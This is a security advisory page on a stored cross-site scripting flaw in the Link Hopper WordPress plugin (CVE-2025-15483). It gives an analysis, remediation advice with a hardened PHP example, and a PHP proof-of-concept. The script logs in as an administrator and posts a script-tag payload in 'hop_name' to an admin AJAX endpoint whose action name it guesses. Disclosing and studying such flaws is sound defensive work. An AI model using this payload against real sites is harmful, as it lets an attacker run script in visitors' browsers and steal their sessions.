Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15483: Link Hopper <= 2.5 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'hop_name' Parameter (link-hopper)

Plugin link-hopper
Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 2.5
Patched Version
Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15483 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Link Hopper WordPress plugin. The 'hop_name' parameter is not properly neutralized before being stored and later output. Attackers with administrator-level privileges can inject arbitrary scripts, which execute when a user visits a compromised page. The CVSS score of 4.4 reflects the high privileges required and the conditional nature of the attack, which only works on multisite installations or sites where the 'unfiltered_html' capability is disabled.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for the 'hop_name' parameter. The CWE-79 classification confirms improper neutralization of input during web page generation. Without a code diff, this conclusion is based on the vulnerability description and standard WordPress security patterns. The plugin likely accepts user input via an administrative function, stores it in the database without adequate sanitization, and later outputs it without proper escaping.

Exploitation requires an attacker to have an administrator account on the WordPress site. The attack vector is a POST request to a plugin-specific administrative handler, such as an AJAX action or a settings page form submission. The payload would be JavaScript placed in the 'hop_name' parameter. An example payload is alert('Atomic Edge XSS'). The injected script persists in the database and executes in the context of any user viewing the affected page.

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize the 'hop_name' parameter on input using a function like sanitize_text_field() and escape it on output using esc_html() or a similar context-appropriate function. A security nonce should also be verified for the relevant administrative action to prevent CSRF attacks. These are standard WordPress security practices for mitigating XSS.
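The hardened save-and-render pattern described above, as an added example that is not Link Hopper's code and not part of the Atomic Edge PoC; the AJAX action name, option key, nonce action and function names are assumptions used to illustrate the fix.

```php
<?php
// Added example: hardened handling of a 'hop_name' value in a WordPress plugin.
// All identifiers (ahx_* functions, 'ahx_hop_name' option, 'ahx_save_hop' nonce
// action) are assumptions, not Link Hopper's real names.
//
// The weak pattern the analysis infers looks roughly like this (do not use):
//     update_option( 'hop_name', $_POST['hop_name'] );   // no nonce, no sanitizing
//     echo get_option( 'hop_name' );                      // no escaping on output

// Admin form: emits the nonce the save handler later verifies; the current
// value is escaped for an HTML attribute context.
function ahx_render_hop_form() {
    $hop_name = get_option( 'ahx_hop_name', '' );
    echo '<form method="post" class="ahx-hop-form">';
    wp_nonce_field( 'ahx_save_hop', 'ahx_nonce' );
    echo '<input type="text" name="hop_name" value="' . esc_attr( $hop_name ) . '">';
    echo '</form>';
}

// Input side: capability check, nonce check (CSRF), then sanitize before storing.
function ahx_save_hop() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // Dies with HTTP 403 when the nonce is missing or invalid.
    check_ajax_referer( 'ahx_save_hop', 'ahx_nonce' );

    $raw      = isset( $_POST['hop_name'] ) ? wp_unslash( $_POST['hop_name'] ) : '';
    // sanitize_text_field(): strips tags, converts lone '<' to an entity,
    // removes line breaks and extra whitespace.
    $hop_name = sanitize_text_field( $raw );
    if ( '' === $hop_name || strlen( $hop_name ) > 100 ) {
        wp_send_json_error( 'hop_name must be 1-100 characters' );
    }
    update_option( 'ahx_hop_name', $hop_name );
    wp_send_json_success( array( 'hop_name' => $hop_name ) );
}
add_action( 'wp_ajax_ahx_save_hop', 'ahx_save_hop' );

// Output side: escape for the HTML text context the value lands in, even
// though it was sanitized on the way in (defence in depth; stored values
// written before the fix are still neutralized here).
function ahx_print_hop_name() {
    $hop_name = get_option( 'ahx_hop_name', '' );
    echo '<span class="hop-name">' . esc_html( $hop_name ) . '</span>';
}
```

Sanitizing on input limits what reaches the database; escaping on output is what actually prevents stored script from rendering, so both belong in the fix.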

The impact of successful exploitation is client-side code execution in the victim’s browser. An attacker can steal session cookies, perform actions on behalf of the user, or deface the site. The requirement for administrator privileges limits the attack surface, but a compromised admin account could lead to a complete site takeover. The stored nature of the XSS means the payload executes for all users accessing the infected page, amplifying the potential damage.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15483 - Link Hopper <= 2.5 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'hop_name' Parameter

// CONFIGURATION
$target_url = 'https://target-site.com';
$username = 'admin';
$password = 'password';

// PAYLOAD
// This is a basic proof-of-concept alert. A real attack would use a more malicious script.
$malicious_hop_name = '<script>alert("Atomic Edge XSS via hop_name")</script>';

// ASSUMPTIONS
// 1. The plugin uses a standard WordPress AJAX handler or admin-post endpoint for saving link data.
// 2. The vulnerable parameter is 'hop_name' and is submitted via POST.
// 3. The AJAX action name is likely derived from the plugin slug, e.g., 'link_hopper_save'.
// 4. A valid WordPress nonce is required. The script logs in to obtain a fresh nonce.

function poc_cve_2025_15483($target_url, $username, $password, $malicious_payload) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic Edge PoC');

    // STEP 1: Authenticate to WordPress
    $login_url = $target_url . '/wp-login.php';
    $login_data = array(
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    );
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    $response = curl_exec($ch);
    if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
        echo "[!] Authentication failed. Check credentials.\n";
        curl_close($ch);
        return false;
    }
    echo "[*] Authenticated as administrator.\n";

    // STEP 2: Attempt to exploit the vulnerable endpoint.
    // The exact AJAX action is inferred from the plugin slug. Common patterns are used.
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    $exploit_data = array(
        'action' => 'link_hopper_save', // Inferred AJAX action name
        'hop_name' => $malicious_payload,
        // Other required parameters are unknown without code. This is a best-effort attempt.
        'nonce' => 'placeholder_nonce' // A real nonce would need to be scraped from an admin page.
    );
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
    $response = curl_exec($ch);
    echo "[*] Sent payload to inferred AJAX endpoint. Response length: " . strlen($response) . "\n";
    echo "[*] If the plugin accepted the request, the XSS payload is now stored.\n";
    echo "[*] Visit any front-end page that outputs the 'hop_name' to trigger the script.\n";

    curl_close($ch);
    return true;
}

// Execute the PoC
poc_cve_2025_15483($target_url, $username, $password, $malicious_hop_name);

?>
